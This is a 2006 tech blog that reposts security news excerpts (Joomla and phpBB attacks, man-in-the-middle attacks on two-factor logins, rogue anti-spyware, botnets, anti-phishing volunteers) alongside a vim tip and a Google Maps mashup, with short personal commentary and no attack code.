Monday, July 31, 2006

Pinch My Ride

Quite an amazing tale of physical/electronic security being beat...

Pinch My Ride: "Brad Stone writes on Wired News:

Last summer Emad Wassef walked out of a Target store in Orange County, California, to find a big space where his 2003 Lincoln Navigator had been. The 38-year-old truck driver and former reserve Los Angeles police officer did what anyone would do: He reported the theft to the cops and called his insurance company."


From: Fergie's Tech Blog

posted by John's Tech Blog at 15:09 0 comments links to this post  

Attacks against Joomla com_peoplebook, (Sun, Jul 30th)

Yes, I have a handful of stories piling up, but I wanted to let this one through first. I don't think I need to make any cynical remarks about PHP and security...it's all about the apps, and to date, I've not seen a lot of well coded PHP apps out there. Here's yet another PHP app that allowed a system to be compromised...

Attacks against Joomla com_peoplebook, (Sun, Jul 30th): "As reported in a couple of previous diaries (http://isc.sans.org/diary.php?storyid=1483 & 1480 ), less than adequate input validation resulted in a fair few attacks against Joomla and Mambo components. Joomla is a powerful open-source Content Management System written in php. Yesterday we received word of another attack, this time against com_peoplebook.
Here are a few of the httpd log entries that we were provided, suitably sanitized at the hosting provider's request. Note the timelag between log entries - there was a living human at the other end of the wire manually manipulating this server.
[...]"

Source: ISC SANS

posted by John's Tech Blog at 11:01 0 comments links to this post  

Friday, July 14, 2006

Tip #1283 - How to edit tips in mozilla using vim - mozex

I'm quite pleased to say this works for me! I've been wanting this feature for some time now.

Tip #1283 - How to edit tips in mozilla using vim - mozex: "Hi,

This is very similar to vimtip#581. In fact, I'm just trying to shamelessly drag your attention to http://mozex.mozdev.org again. I adopted mozex plugin and I'm continuing it's development. All the installation (and de-installation) issues for any mozilla based browser should be fixed. And there's much more new things (start external editor by hotkey, nice configuration dialog, utf-8 editing and more). Just be sure to install latest development version.

Any comments are welcome.

Hope this helps
--
Vladimir"


Source: tips : vim online

posted by John's Tech Blog at 17:54 0 comments links to this post  

Thursday, July 13, 2006

Number Theory, (Sun, Jul 2nd)

Never quite learned the nitty gritty of IP addresses or subnet masks? Read this, and with any luck, it'll all click. (No pun intended.)

Number Theory, (Sun, Jul 2nd): "Yesterday we posted a diary entry about mystery URLs found in some Apache logs. We received many responses, and several readers pointed out that the strings are probably obfuscations of dotted-quad IP addresses. A few readers suggested that since the strings are nine numbers they could be US Social Security Numbers (for those outside the USA, we keep track of all our citizens through a system that is "not" supposed to be a national identity but has become one out of convenience; the nine-digit number is represented as XXX-YY-ZZZZ and the XXX part is a reference code to the general part of the USA you were in when you registered for the number.) I'll give you my theory about the mystery URLs in a moment.
...
[Read the full story for a great lesson!]

From: SANS ISC

posted by John's Tech Blog at 12:18 0 comments links to this post  

phpbb 0 day worm or just too many unpatched boxes?, (Thu, Jul 13th)

Running phpBB? I think I'd recommend that you just scrap that idea, and find something more secure. Maybe this particular instance is a false alarm, but I can't even count the number of times I've seen warnings about phpBB exploits.

phpbb 0 day worm or just too many unpatched boxes?, (Thu, Jul 13th): "We recieved a report of a phpbb 0 day.

Upon investigation, it may be a re-hash of the mosConfig_absolute_path exploit hitting unpatched systems.

We're looking into the report and will update the diary as we get new information."


From: SANS ISC

posted by John's Tech Blog at 11:10 0 comments links to this post  

Overplot

Simply incredible - Mihai never ceases to do extremely cool stuff with Javascript. However, when it comes to practical Google Maps mashups regarding NY, I'm personally quite fond of onNYTurf's NYC Subway Map.

Overplot: "Google engineer Mihai Parparita's latest Maps mashup is just too nifty not to mention here on Code: Overheard in NY + Maps' API + Reader = Overplot

His blog post explains a few of the specific problems he encountered while creating it:

'The most basic issue with implementing this is geocoding all of the location strings (like 'Canal & Broadway') to a latitude/longitude pair... It is not perfect, but since the set of addresses is pretty tightly constrained, I was able to add some rewriting rules to make the input more easily parsed. As of right now, 54% of the addresses are geocoded.'
'I didn't want to directly scrape the HTML of the site to extract all of the quotes. I ended up using the data stored in Google Reader's archive of the site's feed. This allowed me to get at the quotes themselves more easily, without having to worry about the chrome of the site.'
'Instead of each marker being its own overlay, I put all of them in the same overlay (see the QuotesOverlay class). Additionally, I did not ..."

Mihai's full post @ persistent.info.

P.S. I should point out that Overheard in NY is a pretty crass website, with humor that may not amuse all audiences.

From: Google Code Blog

posted by John's Tech Blog at 10:40 0 comments links to this post  

Recent Two factor authentication attacks, (Wed, Jul 12th)

Well, it was only a matter of time before this happened...quite a clever scam, as usual. (Last I'd heard, CAPTCHAs were being defeated by displaying them on download pages for other resources, and getting interested humans to enter the code, proxying the result to the original site.) Also, F-Secure has a similar story which I considered posting, but I'm going to favor ISC's piece in this case.

Recent Two factor authentication attacks, (Wed, Jul 12th): "There has been recent report of two factor authentication protected websites getting attacked by the man-in-the-middle type of setup where the victim enter information (include the token code) into a look-alike website, this look-alike website immediate uses those credential to login to the actual financial site. Obviously, upon success login by the user, the attacker can immediately execute the fraudalent transaction.

While this might sound shocking to the financial industry since we haven't seen too many of these attacks, the theory of the attack and the risk have certainly been well understood within the security community. (I have written an article on this back in April)

Overall, two factor authentication will reduce the risk of attacks by raising the effort of the attacker to compromise the accounts, but it might not have the level of security enhancement that some people believed. In the man-in-the-middle attack, the flaw happens due to the lack of verification of the bank's website by the victim, the victim are simply tricked into yielding credentials" ...

Source: SANS ISC

posted by John's Tech Blog at 00:21 0 comments links to this post  

Monday, July 10, 2006

Google releases answer to Passport

Well, I've yet to say a thing about Google Checkout (I'm quite hesitant to give Google my CC#), and I think I'll keep it that way. Instead, let me post this, which is far more interesting.
Google releases answer to Passport: "Google just released the Account Authentication Proxy for Web-Based Applications [Update: Google has removed the page this link points to] -- which looks a lot like Passport. According to the website, this proxy lets web-based applications create services protected by a Google Account by enabling a web application to get an authentication token without ever [...]"
From: ZDNet Blogs: Googling Google

posted by John's Tech Blog at 14:08 0 comments links to this post  

Security Rollup

...not the Microsoft or Apple kind, though. (The MS one comes out tomorrow, by the way.)

I've been a bit remiss at posting this stuff, but left it pending... and still don't have time to add writeups to these fine stories.

SANS ISC

Hacking Wireless Drivers for Fun and Profit, (Fri, Jul 7th): "An ISC reader pointed out this relatively new exploit vector. At the upcoming BlackHat conference, a duo is going to demonstrate hacking WiFi device drivers to assume control of a target machine. The combination of device drivers (which sit close to the kernel) and wireless technology makes this vector uniquely possible. Most devices drivers you couldn't safely attack because devices are attached to the actual hardware, but wireless is meant to work over distance. The vector is still limited by distance to those close enough to some transmission agent, but with the growing prevalence of free wireless hotspots it is easy to find places where enough laptops congregate to get good results (say a conference or in an airport terminal). Basically it's a neat little vector of attacks I imagine we'll be seeing more of in the near future.

---
John Bambenek
bambenek /at/ gmail /dot/ com"

F-Secure Weblog

$pyware Economics: "

On April 7th we posted about New York's lawsuit against Direct Revenue.

BusinessWeek has been examining the court documents and they have a very interesting article, The Plot To Hijack Your Computer, and related items detailing Direct Revenue's business model.

There's also a podcast for those of you on the go. Check it out.

On 08/07/06 At 06:17 AM"

What's In a Name?: "There's a category of software that's rather difficult to define, or at least to name. Many term it as potentially unwanted applications or software (PUA/PUS). Companies pushing this type of software use every possible means to get you to download as many copies of their product as possible. Spamming, pop-ups, hijacking start pages, etc. Sound familiar?

What are we speaking of? Rogue anti-spyware and other so-called system optimization utilities. And they aren't just pushing one version, they're pushing many.

Some of these guys create one engine and then sell it under multiple names and interfaces. Their websites even look like they are copied from the same template. The sales pitch typically includes a 'free' scan. The results of the scan are often doctored with items that you should remove or fix. Except in order to do so, you now need to buy a license.

Check out the results of this Google search. Most of the results are of suspected rogues and are hosted on the same server. What did we search for? A block of text from one site's privacy policy."
...

Sunbelt Blog

Botnet primers: "A lot of activity is going on in the area of botnets. If you’re curious about them, you can study a few key references.

An Inside Look at Botnets. Paul Barford. Vinod Yegneswaran. Link here.

Botnets as a Vehicle for Online Crime - CERT/CC. Link here.

Know your Enemy: Tracking Botnets. Link here.

Jose Nazario over at Arbonetworks was kind enough to put these references together. As he says, “Read those and you'll be largely up to date with most IRC bots. Everything since then is largely incremental - crypto, obfuscation, etc. These do not cover P2P bots and HTTP bots, which are becoming hot topics.”

Happy reading.

Alex Eckelberry"


The end of an era: "Well this is one RIP that no one will grieve over:

Claria will stop displaying GAIN pop-up and other ads on July 1, 2006 and will stop supporting all GAIN Supported Software on October 1, 2006. After October 1, 2006, GAIN software may not function properly.

Our software will continue to collect data about your web usage from your computer for research and other purposes as described in our Privacy Statement until September 30, 2006, unless you uninstall the software before this date.

It is recommended that you uninstall all of GAIN Supported Software presently on your computer. To view a list of GAIN Supported Software installed on the computer you are currently using click here.

First time I’ve ever seen a spyware product ask you to uninstall itself.

Link here.

Alex Eckelberry
(Hat tip to Richard Smith)"

posted by John's Tech Blog at 12:20 0 comments links to this post  

Wednesday, July 05, 2006

PIRT rocks!

Personally, I plan on joining this, and reporting some more phishes as I get them. Having not seen a proper clearinghouse mechanism in the past, I've only reported the ones I had time to report...to the compromised site and/or the company that's been spoofed. If you can, lend a hand to these fine folks!

PIRT rocks!: "Gary Warner, a steadfast volunteer who works on PIRT (the all-volunteer antiphishing group I started with Paul and Robin Laudanski), has some news to share of how well it’s going. It’s just incredible what’s happening out there — PIRT is really making a difference.

From an email from Gary:
Every day the PIRT Squad receives dozens of thank you notes from Brand Owners, Web Masters, and Network Owners, thanking us for letting them know about the Phish we have reported to them.

Do you know that NetCraft, who has an Anti-Phishing Toolbar used by tens of thousands of people to help protect themselves from phishing sites, says our team is #1 at reporting phish? This month we have notified them of 631 phishing sites that they have confirmed themselves to be phish. That is more than 40% of all the phishing sites confirmed by NetCraft for the month! (In May, we reported 1593 phishing URLs to them that they confirmed we were the FIRST anti-phishers to report!)

May was an INCREDIBLE month for PIRT. We produced 1143" ...


From: Sunbelt Blog

posted by John's Tech Blog at 15:39 0 comments links to this post